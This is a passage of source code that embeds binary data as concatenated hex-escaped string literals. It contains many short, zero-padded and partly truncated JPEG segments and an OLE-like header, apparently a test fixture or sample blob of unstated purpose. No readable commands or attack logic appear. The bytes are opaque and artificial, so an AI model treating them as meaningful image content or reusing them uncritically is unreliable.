+"\xf7\xa7\xcf\xa7\xa3\x68\xaf\xa6\xd9\x38\x89\x0a\x79\x79\xce\xec"
+"\x03\xf7\xbf\x12\x33\xf9\xd6\x75\xcd\x92\x5a\x6a\xb7\x13\xc9\x15"
+"\xe0\x8e\x55\x41\x0c\xb6\x7b\x89\x8f\x6a\xe0\xa1\x0b\xdb\x8c\x8c"
+"\x82\x39\x35\x4b\x96\x42\x7c\xd1\x36\xad\x2e\xa0\xbc\x80\x4d\x6e"
+"\xfb\xd3\x24\x1e\x30\x41\x1d\x41\x07\x90\x7d\xa9\x6e\x2e\xed\xad"
+"\x9a\x35\xb8\x9e\x38\x8c\xad\xb5\x03\xb0\x1b\x8f\xa0\xaa\x9a\x35"
+"\xb3\x45\x1c\xd7\x0e\xf3\x96\xb9\x7d\xe5\x67\x45\x56\x5c\x00\xa3"
+"\x21\x78\xce\x00\xac\xbb\xe9\x64\x8f\x52\xd4\x35\x48\xe4\x67\x16"
+"\x8a\xb6\xf1\xc2\xc0\x32\xc9\x23\x00\x4a\x8e\xe3\x92\x9d\x3d\x0d"
+"\x4a\x82\x72\x69\x14\xe6\xd4\x53\x67\x4b\x45\x57\xb3\x6b\xb6\x8b"
+"\x37\xb1\xc5\x1b\xf6\x11\xb9\x6f\xcf\x20\x55\x8a\xc9\xe8\x68\x9d"
+"\xca\x34\x51\x45\x49\xa0\x91\xa2\xc5\x23\xc9\x1a\x2a\x3b\x9c\xb9"
+"\x03\x05\x8f\xbf\xad\x3e\x19\x65\x8a\x36\x0e\xe6\x76\xc9\x20\xb0"
+"\x0b\xf4\x1c\x0a\x6d\x14\xee\x2b\x22\x45\xbd\x44\xb4\xf3\xee\xc0"
+"\xb7\xc2\xe5\xc1\x39\x0b\xf8\x8a\x84\xe9\x76\xec\xb0\x79\x6c\xc1"
+"\x12\xe0\xdc\xb0\xce\x7c\xc6\x39\x3c\x9f\xa9\xcf\xe0\x29\xd4\xd9"
+"\x10\x48\xaa\x0b\x3a\xed\x60\xc3\x63\x15\xe4\x7d\x3f\x95\x52\x95"
+"\x88\x70\xb9\xa1\x45\x53\x69\xe7\xf3\x23\xd9\xe5\xec\xcf\xcf\xb8"
+"\x1c\x91\xed\x53\xc1\x71\x14\xfb\xfc\xa7\x0d\xe5\xb6\xc7\x03\xf8"
+"\x5b\xae\x0f\xe6\x29\x0c\xad\x45\x14\x54\x96\x14\x51\x45\x00\x14"
+"\x51\x45\x00\x15\x9d\x34\xaa\xd7\x32\x88\xf2\x0a\x36\xd6\xe3\x1c"
+"\xe0\x1f\xc7\xa8\xad\x1a\xce\x9e\x4d\xf7\x12\x0d\xac\xbb\x1b\x6f"
+"\xcc\x31\x9e\x3a\x8f\x6e\x69\xa2\x58\xff\xd9\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40"
+"\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c"
+"\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa3\xb1\xd1\x9c"
+"\x3c\x86\x42\x5c\x90\x48\xc6\x01\x3c\x0f\xc3\xa5\x5e\xaa\x3e\x59"
+"\x8d\xdd\x77\xbb\xe5\xcb\x65\x8e\x48\xc9\xce\x3e\x83\xb5\x0f\x60"
+"\x5b\x85\x14\xb8\x23\xb1\xa3\x07\x38\xc1\xcd\x49\x62\x51\x4b\x83"
+"\xfe\xff\x00\x00\x02\x00\x00\x00\x00\x01\x01\x00\x54\xc1\xce\x11"
+"\x85\x53\x00\xaa\x00\xa1\xf9\x5b\x01\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00"
+"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00"
+"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80"
+"\x0a\x29\x92\xcb\x1c\x29\xbe\x69\x16\x35\xf5\x63\x81\x49\xe6\x1f"
+"\x38\x20\x8d\x88\xc6\x4b\xf6\x14\x58\x57\x24\xa6\x49\x2c\x71\x01"
+"\xe6\x38\x5c\xf0\x33\xde\x98\x23\x95\xd5\xc4\xd2\x00\x1b\xa7\x97"
+"\xc6\x3f\x1a\x86\xe2\xea\xce\xc0\x47\x1c\xae\x37\x9f\xb8\x9f\x79"
+"\xdb\xe8\x3a\x9a\x69\x5c\x4d\xdb\x52\x7f\x31\xcc\xc5\x04\x4d\xb4"
+"\x0f\xbe\x4f\x15\x14\xcc\x90\xdb\x3b\x5f\xdc\xa2\x27\x52\xc1\xb6"
+"\x00\x3e\xb9\xaa\xfe\x76\xa5\x79\xc4\x11\x0b\x38\x8f\xf1\xcd\xcb"
+"\x9f\xa2\xf6\xfc\x6a\x48\x34\xb8\x23\x94\x4d\x31\x7b\x99\x87\x3e"
+"\x64\xa7\x38\xfa\x0e\x82\xaa\xc9\x6e\x4d\xdb\xd8\xff\xd9\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11"
+"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff"
+"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28"
+"\xa2\x80\x20\xbd\x99\xad\xed\x24\x92\x34\x32\x38\x18\x55\x1d\xcf"
+"\x6a\xc7\x3a\x9e\xa2\x22\x8d\x25\x44\x86\x48\xd9\x44\xce\xea\x48"
+"\xe5\xb1\x9e\x3b\x63\x9e\xb5\xbf\x45\x00\x61\xb6\xb1\x74\x14\x95"
+"\x81\x18\x8f\xba\x00\x6f\xde\xf5\xf9\x97\xdb\x8a\x47\xd6\x2f\x91"
+"\xe5\x56\xb5\x40\x63\x5c\xf3\x9e\x78\x1c\xfd\x39\xad\xda\x4a\x00"
+"\xc7\x7d\x5e\xe0\x42\xf2\x2c\x28\x58\x1c\x08\xc8\x21\x94\x64\x7c"
+"\xc7\xdb\xbd\x30\x6a\xf7\xc2\x16\x9b\xec\x41\xd5\x40\xf9\x13\x25"
+"\x9c\x90\x7a\x7e\x43\xf3\xad\xba\x5a\x00\x28\xa2\x8a\x00\x28\xa2"
+"\xab\xdf\x09\x9a\xd8\xad\xbb\x32\x39\x65\x1b\x94\x02\x40\xc8\xc9"
+"\xe7\xdb\x34\x01\x62\x92\xb0\xa7\x6d\x55\x67\x22\xdf\xed\x2c\xc1"
+"\x9c\x36\xe5\x1b\x36\xff\x00\x09\x07\xd7\xfa\xd2\xba\x5e\xc9\x3c"
+"\x3f\x67\x6b\xa0\x84\xed\x79\x25\x50\x18\x0c\x8c\xe3\xf5\xa0\x0d"
+"\xda\x4a\xc0\x07\x5a\x17\x71\xa9\x2f\xe5\xa9\x00\x1d\xb9\xdc\x37"
+"\x1c\x96\xfc\x31\x56\x6e\xd6\xe1\xf5\xad\xb0\xbb\xa7\xcb\x1e\xe2"
+"\xbd\x93\x2d\x9f\xd4\x0a\x00\xd7\xa2\xa3\x92\x68\xe2\x2a\x1d\x80"
+"\x2c\x70\x07\xad\x27\x98\xfb\xd8\x18\xf6\x20\x1f\x7d\x88\xfe\x54"
+"\x58\x57\x25\xa8\xde\x68\xd2\x45\x8d\x9b\xe6\x6e\x80\x0c\xd6\x6b"
+"\xdf\xc7\x2a\xb5\xbc\x41\xf5\x09\x33\xc8\x88\x6d\x51\xec\x5b\xa5"
+"\x3d\x6c\xef\x6e\x54\x0b\xb9\xfe\xcf\x16\x31\xe4\xdb\x12\x0e\x3d"
+"\x0b\x75\xfc\xb1\x57\xcb\x6d\xc8\xe7\xbe\xc3\xee\x75\x38\xe0\x95"
+"\xe2\x6f\xbf\xd1\x55\x3e\x77\x63\xfe\xe8\xfe\xb5\x52\x5d\x43\x50"
+"\x8c\x44\x1d\x16\x32\xc7\xe5\x8c\x80\xd2\xcb\xf8\x0e\x14\x7b\xd4"
+"\xee\xd6\xfa\x79\x16\x9a\x6d\xba\xb5\xd3\x8c\xed\x1d\x87\xf7\x98"
+"\xf5\xc5\x58\xb1\xb1\x16\xec\xd3\x4c\xfe\x75\xcb\xfd\xf9\x0f\xf2"
+"\x1e\x82\xab\xdd\x4a\xf6\x27\xde\x93\xb5\xc8\x12\x7b\xef\xb4\xa5"
+"\xb4\xad\x12\xcb\x24\x2c\xff\x00\x2a\xe4\x29\xc8\xc0\xf7\xeb\x55"
+"\x1b\x53\xd4\xad\xae\xfc\xab\xab\x78\x89\x6e\x10\x29\xc6\xef\xf7"
+"\x58\xf0\x7e\x87\x15\x7a\x4f\xf9\x18\x21\xff\x00\xaf\x76\xff\x00"
+"\xd0\x85\x5c\xb8\x82\x1b\x98\x5a\x2b\x88\xd6\x48\xdb\xaa\xb0\xc8"
+"\x34\x5d\x2d\xd0\xf9\x5b\xd9\x99\xe9\x7b\x24\xca\x13\x4b\xb4\x2e"
+"\x80\x60\x4d\x2e\x55\x31\xed\xdc\xd3\xc6\x96\xd3\x9d\xda\x95\xc3"
+"\xdc\x1f\xf9\xe6\x3e\x58\xc7\xe1\xdf\xf1\xad\x1a\x2a\x79\xbb\x15"
+"\xc9\xdc\x64\x71\xa4\x48\x12\x34\x54\x51\xd0\x28\xc0\xaa\x37\x37"
+"\x92\xcd\x33\x5a\x69\xc4\x19\x47\x12\x4c\x46\x56\x2f\xf1\x3e\xd4"
+"\xc7\xb8\x97\x52\x73\x0d\x83\x94\xb7\x04\x89\x2e\x47\x7f\x50\x9f"
+"\xe3\x57\xad\xad\xa2\xb5\x80\x45\x02\x05\x41\xfa\xfb\x9a\x2d\xcb"
+"\xab\xdc\x2f\xcd\xa2\xd8\x65\x95\x94\x56\x71\x90\x85\x9d\xd8\xe5"
+"\xe4\x7e\x59\xcf\xa9\x35\x66\x9a\xcc\x17\x1b\xb8\xcf\x14\xdf\x3a"
+"\x33\x8f\x9b\xaf\xb5\x4b\x77\xd5\x94\x92\x5a\x22\x9c\xbf\xf2\x30"
+"\x41\xff\x00\x5e\xef\xfc\xc5\x68\x56\x7c\x87\x76\xb1\x0c\xe3\x3e"
+"\x58\x81\x81\x6c\x77\xc8\xab\x66\x78\xc6\x7e\x6e\x83\x3d\x0d\x39"
+"\x74\x14\x7a\x80\xff\xd9\xf3\x55\xc1\x5c\x0e\xbc\xf4\xa8\xe0\xd4"
+"\xf4\xfb\x88\x64\x9a\x0b\xeb\x69\x62\x8b\x99\x1d\x25\x52\x13\xea"
+"\x73\xc5\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22"
+"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11"
+"\x03\x11\x00\x3f\x00\xee\xa5\xd5\xee\x90\xc6\x22\x8e\x29\xc3\x75"
+"\x74\xc8\x07\xa7\x03\x3d\xf9\xa7\x5e\xdd\xdc\x47\x7f\x2a\xc7\x33"
+"\x86\x5d\x9e\x5c\x21\x32\x1f\x3d\x79\xc5\x6c\x52\xd0\x07\x3b\x26"
+"\xa1\xa8\xac\x29\xe7\xee\x88\x88\xc3\x97\x55\xe1\xf9\xe8\x38\xe0"
+"\xd7\x41\x19\xdd\x1a\xb7\x3c\x80\x79\xeb\x4b\x4b\x40\x05\x14\x51"
+"\x40\x05\x14\x51\x40\x05\x26\x6b\x06\x36\xd5\xbc\xb5\xf3\x3e\xd1"
+"\x92\x17\xed\x18\x51\x95\x6c\xf3\xe5\xfa\x8a\x8e\x78\xef\x30\x67"
+"\x9d\xa5\x19\x44\x48\xf7\xf1\x93\xe6\x8d\xb9\x1e\xb8\xc5\x00\x74"
+"\x74\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x66\x5b\x6a\xaa"
+"\xca\x63\x9b\x8b\x80\x7f\xd5\x32\xf9\x6c\x7f\x02\x7f\x91\x35\x7b"
+"\xce\x8f\x28\xae\x42\xb3\xf2\x15\xb8\x35\x97\x71\x63\x25\xb4\x7b"
+"\x0c\x5f\x6f\xb3\x1f\xf2\xc9\xf9\x92\x31\xfe\xc9\x3d\x7f\x9d\x16"
+"\xd1\x33\x44\x25\xd2\x6f\x3c\xc8\xc1\xff\x00\x51\x71\xf3\x05\x3e"
+"\x99\xea\xb5\xab\x8c\x5e\xa8\xc5\x4a\x4b\x46\x6c\xd1\x59\x2b\x7c"
+"\xb6\xf2\xb1\xbe\x86\x5b\x47\x6e\x37\xe7\x74\x64\xfa\xe7\xb7\xe3"
+"\x8a\xbd\x1c\x92\x7d\x9c\x3a\x95\xb9\xe7\x83\x19\x03\x23\xf3\xc5"
+"\x43\x8b\x46\x8a\x49\x96\x28\xa8\x8c\xf1\xab\x22\x48\x76\x3b\x8e"
+"\x15\xbf\x97\xa5\x49\x52\x50\xb4\x51\x45\x00\x15\x4a\xeb\x4e\x59"
+"\x25\xfb\x45\xb3\x9b\x7b\x9f\xf9\xe8\xbd\x1b\xd9\x87\x7a\xb6\xae"
+"\xac\x48\x53\x9c\x53\xa9\xa6\xd6\xc2\x69\x3d\xcc\xe8\xaf\xca\xc8"
+"\x2d\xb5\x38\xc4\x32\x37\x0a\xdd\x63\x93\xe8\x7f\xa1\xa5\x7d\x2a"
+"\x25\x73\x25\x8c\xaf\x67\x21\xe7\xf7\x7f\x74\xfd\x54\xf1\x57\x27"
+"\x86\x2b\x88\x8c\x53\x22\xba\x37\x50\xc2\xb3\xfc\xbb\xbd\x37\x98"
+"\x37\xdd\xda\x8f\xf9\x64\x4e\x64\x41\xfe\xc9\xef\xf4\xab\x4f\xb6"
+"\x86\x6d\x5b\x7d\x47\x7d\xa6\xfa\xd7\x8b\xdb\x61\x70\x83\xfe\x5a"
+"\xdb\x8f\xe6\xa7\x9f\xc8\x9a\x9a\xd2\x5b\x3b\x92\xf2\x5a\x4a\x37"
+"\xb7\xde\xc1\xe4\x1f\x70\x7b\xd4\xb6\x97\x70\x5e\x43\xe6\xdb\x48"
+"\x1d\x73\x83\xc6\x0a\x9f\x42\x0f\x20\xfb\x54\x77\x5a\x75\xad\xd3"
+"\x6f\x92\x3d\xb2\x0e\x92\x21\xda\xc3\xf1\x14\xae\xb6\x7a\x0e\xcf"
+"\x75\xa9\x2f\xef\xe3\x8b\xb4\xec\x0f\xfb\xbc\x52\x99\xd1\x64\x54"
+"\x7c\xab\x37\x41\x8f\xeb\x54\xbc\xbd\x4a\xcf\xfd\x5c\x8b\x7b\x10"
+"\xfe\x19\x3e\x57\x1f\x8f\x43\x52\x43\xaa\x5b\x49\x2a\xc1\x36\xeb"
+"\x69\xdb\xa4\x53\x0d\xa4\xfd\x3d\x7f\x0a\x39\x7b\x0f\x9b\xbe\x80"
+"\xff\xd9\xad\x4a\xb6\x5a\x4d\x96\x91\xa6\x86\x37\x76\x86\x74\x12"
+"\xdc\x12\x22\x00\x8f\xbc\xc4\x12\x47\xcd\xfc\xab\x62\xd4\xff\xd8"
+"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01"
+"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f"
+"\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28"
+"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28"
+"\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28"
+"\xa2\x80\x10\x10\x7a\x1a\x5a\x8b\xc8\x8c\x33\xb2\x0d\x8c\xfd\x59"
+"\x69\xb8\x9e\x38\x80\x42\x26\x60\x7f\x8b\xe5\xc8\xfc\x29\x8a\xe4"
+"\xf4\x54\x7e\x68\x12\x2a\x32\x38\x24\x75\xdb\x91\xf9\xd3\xc1\x04"
+"\x64\x10\x7e\x94\x86\x2d\x14\x51\x40\x05\x14\x51\x40\x00\xff\xd9"
+"\x3d\x32\xc6\x28\x41\xca\xda\xa6\xf6\x94\xe3\xfb\xc5\x46\xd1\xdf"
+"\x8e\x7d\xe8\x02\x6f\x16\x4f\x25\xbf\x86\x2f\xde\xff\xd8\xff\xc0"
+"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11"
+"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5"
+"\x5a\x6b\xae\xe4\x2b\xb8\xae\x7b\x8e\xa2\xa3\x92\x29\x1d\xb2\xb3"
+"\xba\x0c\x74\x00\x54\xa3\x81\xeb\x40\x0d\x48\x95\x55\x47\x2c\x57"
+"\xa1\x63\x93\xf9\xd2\x4d\x3c\x36\xe9\xbe\x79\x52\x35\xf5\x63\x81"
+"\x52\x55\x7b\xab\x5f\xb4\x34\x6e\xb2\xb4\x52\x46\x4e\xd6\x50\x0e"
+"\x33\xc1\xeb\xc5\x00\x54\xbc\x95\x26\x97\x68\xd4\xd2\x08\x54\x65"
+"\xc4\x64\x6e\x3f\xf0\x2e\xd5\x2e\x9d\x0e\x9f\x19\x73\x62\x63\x67"
+"\x3c\xbb\x86\xdc\xcd\xf5\x3d\x4d\x31\xb4\x78\x5e\x40\xcf\x2c\x8c"
+"\xaa\xfb\xc2\x9c\x70\xc4\x82\x4f\x4f\x6a\xb1\x6d\x65\x15\xb3\xee"
+"\x8f\x3f\x77\x6f\xea\x4f\xf5\xa7\xcc\xed\x62\x79\x55\xee\x59\xa2"
+"\x8a\x29\x14\x14\x51\x45\x00\x14\x51\x45\x00\x14\x51\x45\x00\x14"
+"\x51\x4d\x77\x54\x52\xce\x42\xa8\xea\x4d\x00\x3a\x8a\x28\xa0\x02"
+"\x8a\x42\x40\x19\x27\x02\xa2\x6b\x85\x07\x0a\x0b\x73\x83\x8e\xd4"
+"\x01\x35\x46\xf3\x22\x70\x4e\x48\x38\x20\x73\x55\xda\x47\x71\x87"
+"\x38\x04\x60\x81\xd2\x9b\x4a\xe3\xb1\x23\x4e\xed\xf7\x46\xd1\xcf"
+"\xbd\x47\x8f\x9b\x71\xe5\xb1\x8c\x9e\xb8\xa2\x91\x98\x2a\x96\x62"
+"\x00\x1d\x49\x3d\x28\x1d\x8b\xae\xea\x80\x16\x20\x64\xe2\xa1\x6b"
+"\x82\x7e\xe2\xe3\xaf\x27\xb5\x17\x5f\xc1\xd7\xbf\x4e\x95\x0d\x0d"
+"\x89\x21\x58\x96\xfb\xe7\x76\x7a\xfa\x7e\x54\x94\x51\x48\x61\x45"
+"\x14\x8e\x0b\x21\x0a\xdb\x49\xef\x8e\x94\x0c\x6b\xca\xa8\xca\xa7"
+"\x25\x9b\xa0\x03\x34\x8a\x8c\x4b\x79\xac\x19\x49\xe1\x71\xc0\xa6"
+"\xb4\x91\xda\xc3\x19\x99\xf6\x86\xce\x37\x1c\xb1\xc5\x46\x35\x0b"
+"\x73\x8f\x9f\x1c\x7a\x1a\x52\x9c\x63\xa3\x62\x49\xc8\xff\xd9\xa6"
+"\xe2\x49\x2d\x23\xbc\x92\x33\x30\x46\x54\x7e\x81\x72\x3e\x63\xc1"
+"\xf4\x1d\x39\xe6\xa9\xd8\xe9\x17\x91\xe8\x56\xff\xd8\xff\xc0\x00"
+"\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
+"\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x42"
+"\x70\x32\x78\x15\x46\xea\x6b\x1b\xb8\x0c\x4f\x76\xa1\x18\xfc\xc1"
+"\x5f\x1b\x80\xea\x0f\xb5\x5d\x91\x04\x91\xb4\x6d\xf7\x58\x10\x6b"
+"\x32\x4d\x15\x0a\x3b\x09\x59\xa5\x29\xb1\x59\x80\x00\x01\x8c\x74"
+"\xfa\x51\x7b\x03\x57\x2f\xda\x3d\xbb\x5b\xa8\xb4\x64\x31\x27\xca"
+"\x02\x74\x18\xed\x53\x55\x3d\x36\xd6\x4b\x58\x64\x13\xc8\x24\x92"
+"\x49\x0b\xb1\x03\x03\x9f\xff\x00\x55\x5c\xa0\x08\x2e\xb3\xb5\x7a"
+"\xf5\xed\xfd\x6b\x23\x53\xba\x9a\x19\x12\x38\x8e\xdc\x8d\xc4\xf5"
+"\xfc\x2b\x5a\xe8\x83\xb4\x70\x48\x39\xeb\xd2\xb1\x35\x84\x61\x34"
+"\x72\x6d\x25\x76\x90\x48\x5c\xe3\x9a\xe6\xc5\x39\x2a\x4d\xc3\x73"
+"\x5a\x2a\x2e\x6b\x9b\x62\x8c\xba\xbc\xd0\xca\x91\x49\x73\xb5\x9c"
+"\x64\x12\xa3\xb5\x5a\x82\xfe\xe7\xed\x11\x87\x7d\xea\xcc\x01\x18"
+"\x03\xad\x67\x4d\x6e\x93\x4a\x8e\xc1\xf2\xa4\x63\x00\xfa\x83\xfd"
+"\x2a\xc4\x0a\xd2\x5c\xc2\x11\x09\xf9\xd5\xb9\x07\x81\x9e\xb5\xe4"
+"\xd2\xab\x5d\xce\x2a\xef\x7d\x4e\xe9\xc2\x92\x8b\xd8\xec\x29\x09"
+"\xc0\xc9\xa8\x5e\xe3\x07\x08\xb9\xc1\xc1\x26\xa1\x66\x67\xfb\xed"
+"\x9e\xde\xd5\xef\x9e\x61\x61\xe7\x45\xc8\x1f\x31\x18\xe0\x54\x2d"
+"\x34\x8c\x7a\xed\x00\xf6\xee\x29\x9d\x05\x43\x96\x9e\x33\xb0\xbc"
+"\x43\x3f\x7b\x1c\x91\xed\x48\x63\xb7\xa2\xb8\x89\x0e\x5c\x2f\x03"
+"\xd3\xeb\x54\xe4\xb9\xb8\x91\xcd\xad\xb3\x2b\xcf\xff\x00\x2d\x24"
+"\xc7\xcb\x10\xfe\xa7\xda\x89\x67\x92\xf2\x56\xb7\xb1\x3b\x51\x4e"
+"\xd9\x6e\x07\x62\x3a\xa8\xf5\x3f\xca\xae\x5b\x5b\xc5\x6d\x08\x8a"
+"\x15\xda\xa3\xf3\x27\xd4\xd5\xe9\x1d\xf7\x23\x59\x6d\xb1\x8f\x25"
+"\xbc\xee\x2e\xd2\x09\xe6\x63\x6e\x10\x0f\x9c\xe5\xce\x09\x6f\xcf"
+"\x35\x2c\x37\x93\x40\x90\xcb\x3c\xdb\xed\x18\x64\x4e\x47\x41\xe8"
+"\xfe\x9f\x5a\xb3\xa4\xfc\xf0\x4b\x3f\xfc\xf6\x99\xdb\x3e\xd9\xc0"
+"\xfe\x54\xdb\x70\x2d\x2f\xde\xd1\x80\xf2\x67\xcc\x91\x03\xeb\xfc"
+"\x4b\xfd\x6a\xdc\xaf\x74\xcc\xd4\x6d\x66\xba\xff\x00\x48\xd0\xa6"
+"\x48\xe5\x54\xec\x5d\xec\x3f\x84\x1a\x4d\xef\x23\x23\x45\xb4\xc4"
+"\x46\x4b\x7a\xfd\x28\xc4\x56\xf1\xbb\x9c\x22\xfd\xe6\x62\x7f\x9d"
+"\x63\x63\x7b\x86\xc0\x58\x4b\x21\x20\xa8\xe9\x9e\x07\xbd\x52\x69"
+"\x24\xd4\xd8\xc7\x03\x34\x76\x83\x87\x95\x4e\x0c\x9e\xca\x7b\x0f"
+"\x7a\x40\x24\xd5\x4e\x5b\x74\x76\x43\xa2\xf4\x32\xfd\x7d\x17\xf9"
+"\xd6\x8a\xa8\x55\x0a\xa0\x00\x38\x00\x76\xaa\xf8\x7d\x48\xf8\xbd"
+"\x3f\x31\xb0\xc5\x1c\x11\x2c\x50\xa0\x48\xd0\x61\x55\x47\x00\x53"
+"\x6e\xe5\xf2\x6d\x25\x97\xfb\x88\x4f\xe9\x52\xd5\x2d\x60\x93\x63"
+"\xe5\x0e\xb3\x3a\xc7\xf9\x9e\x7f\x4a\x51\xd6\x5a\x95\x2d\x22\xec"
+"\x4b\xa7\x45\xe4\xe9\xd6\xf1\xf7\x58\xc6\x7e\xb8\xa4\xd4\x2d\xde"
+"\x7b\x7c\xc3\x81\x3c\x47\xcc\x88\x9e\x81\x87\xf4\x3c\x8f\xc6\xac"
+"\x81\x81\x81\x45\x1c\xce\xf7\x1f\x2a\xe5\xe5\x19\x3c\xd1\xdb\xc4"
+"\xd2\xcc\xe1\x11\x7a\x93\x54\x92\x19\x75\x07\x13\x5d\x29\x4b\x70"
+"\x73\x1c\x07\xf8\xbd\xdb\xfc\x2a\x26\x9a\xde\x5b\xaf\xb4\x4f\x29"
+"\x91\x50\x66\x28\xf6\x90\x14\xff\x00\x53\x5a\x30\xcc\x97\x01\xcc"
+"\x2c\x18\x26\x33\xce\x38\xa4\xaa\x47\x68\xbb\xb1\x38\xb7\xac\x96"
+"\x84\x94\x50\x08\x20\x10\x72\x0d\x14\x8b\x0a\xa5\x7b\xfb\xcd\x42"
+"\xca\x2e\xc1\x9a\x43\xf8\x0f\xf1\x35\x76\xa2\x36\xea\x6f\x05\xc9"
+"\x27\x70\x42\x80\x76\xeb\x9a\xa8\xbb\x32\x64\xae\xac\x4b\x45\x14"
+"\x54\x94\x00\xff\xd9\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00"
+"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03"
+"\x11\x00\x3f\x00\xf4\x64\xff\x00\x8f\xe8\x8f\x19\xc3\x73\xde\xaf"
+"\xd6\x6a\x99\x05\xd4\x47\x6a\x67\x07\xae\x7f\x9d\x3a\x69\x6f\xbc"
+"\xd7\xf2\x53\x72\x71\xb4\xe0\x7a\x7d\x6a\x39\xac\x8b\x51\xbb\xdc"
+"\xd0\xa2\xb3\x1e\x5d\x50\x11\x88\xd3\x96\xf4\xe8\x39\xff\x00\xeb"
+"\x54\xf1\x0b\xa1\xa8\x39\x66\xcc\x04\x71\xed\xc0\xe9\xfa\xd0\xa7"
+"\x7e\x83\x74\xed\xd5\x11\xdf\xda\xdb\xa4\xbf\x6c\x13\xfd\x92\x7e"
+"\x01\x94\x71\xbc\x7a\x30\xef\x53\xdb\xdf\x5b\x5c\x04\x11\x4c\xac"
+"\xce\xbb\x80\xcf\x24\x7d\x29\x6e\xed\x45\xc8\x43\xbd\xa3\x74\x39"
+"\x56\x00\x1c\x71\x8e\xf5\x52\xcf\x44\xb6\xb3\xb8\x49\xa3\x66\x62"
+"\xa3\xf8\xb1\xd7\x18\xcd\x68\xdb\x66\x49\x25\xb1\xa7\x51\x5c\x5b"
+"\xc3\x73\x11\x8a\xe2\x24\x96\x33\xd5\x5c\x64\x54\xb4\x52\x1e\xe6"
+"\x6a\xca\x18\xb0\x2a\x40\x1c\x86\x3d\x08\xfa\xd4\x83\x2b\xf7\x18"
+"\xaf\x18\xe2\xb3\x9e\xd6\x5b\x1c\xb5\x9a\x09\x2d\xcf\xde\xb6\xf4"
+"\xff\x00\x77\xfc\x2a\x7b\x69\x52\x78\x15\xac\x9d\x42\xab\x10\xc8"
+"\xc3\xa1\xee\x0f\x70\x69\xb8\xf5\x42\x52\xe8\xc8\x25\x16\x93\xea"
+"\x53\xfd\xb5\xd4\x11\xb4\x28\x67\xc6\x06\x3e\xb4\xcb\x79\x61\x89"
+"\x67\x48\xef\x0c\x31\x89\x70\xa5\x7e\x61\xf7\x46\x69\x9a\x8e\x94"
+"\x9a\x95\xcb\x09\xc8\xc0\xe5\x43\x45\xfd\x6a\xed\x85\x92\xda\x41"
+"\xe5\x12\xae\xa0\xfc\xa0\x20\x00\x53\x9d\x9c\x2d\x7d\x45\x4e\xea"
+"\x77\x6b\x41\xef\x22\x0d\xa7\xfb\x42\x40\x0f\xcc\x32\xbd\x45\x49"
+"\x67\x70\x82\x46\xcd\xd3\xcc\x76\x93\xb4\xae\x3a\x7a\x52\xec\x51"
+"\xd0\x01\x81\x81\xc7\x4a\x95\x64\xda\x72\x63\x43\xd8\x60\x60\xfb"
+"\xd6\x0a\x2e\xf7\x3a\x1c\xd5\xad\x6f\xcb\xfc\x8b\x28\xc1\xd1\x58"
+"\x74\x61\x91\x4e\xa8\x92\x78\xce\x07\xdd\x24\xe0\x03\x52\x02\x08"
+"\xc8\xe4\x56\xa6\x26\x65\x9d\xc2\xdd\xda\xa4\xe8\x0a\xee\x1c\xab"
+"\x75\x53\xdc\x1f\x71\x51\x5c\xd9\x6f\x94\xdc\x5a\xbf\x93\x73\x8c"
+"\x16\x03\x87\x03\xb3\x0e\xf5\x1a\x7f\xa1\xea\x85\x0f\xfa\x9b\xa3"
+"\xb9\x7d\x9f\xb8\xfc\x7a\xd5\xfa\x6f\xdd\x77\x42\x5e\xf2\xb3\x29"
+"\xdb\x5e\x09\x5c\xdb\x5d\x47\xe4\xcf\x8e\x50\xf4\x61\xea\xa7\xb8"
